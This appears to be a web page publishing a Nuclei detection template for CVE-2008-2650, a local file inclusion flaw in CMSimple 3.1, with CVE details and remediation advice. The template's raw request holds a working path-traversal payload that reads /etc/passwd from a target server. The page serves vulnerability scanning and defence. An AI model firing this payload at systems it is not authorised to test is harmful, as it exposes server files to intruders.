CMSimple 3.1 - Local File Inclusion

ID: CVE-2008-2650

Severity: medium

Author: pussycat0x

Tags: cve,cve2008,lfi,cmsimple

Description

CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.

YAML Source

id: CVE-2008-2650

info:
  name: CMSimple 3.1 - Local File Inclusion
  author: pussycat0x
  severity: medium
  description: |
    CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
  reference:
    - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
    - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
    - https://nvd.nist.gov/vuln/detail/CVE-2008-2650
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2008-2650
    cwe-id: CWE-22
    epss-score: 0.06344
    epss-percentile: 0.93486
    cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cmsimple
    product: cmsimple
    shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple"
  tags: cve,cve2008,lfi,cmsimple

http:
  - raw:
      - |
        GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008e6e5ba0093aee9fb1c4858af106352cbc43209ef29a5ebb1ba17b10709e20450220451306c8bd198917a02bbf5d6fdd4227bc4477b18ec11fedc962ef339aabd429:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2008/CVE-2008-2650.yaml"

View on Github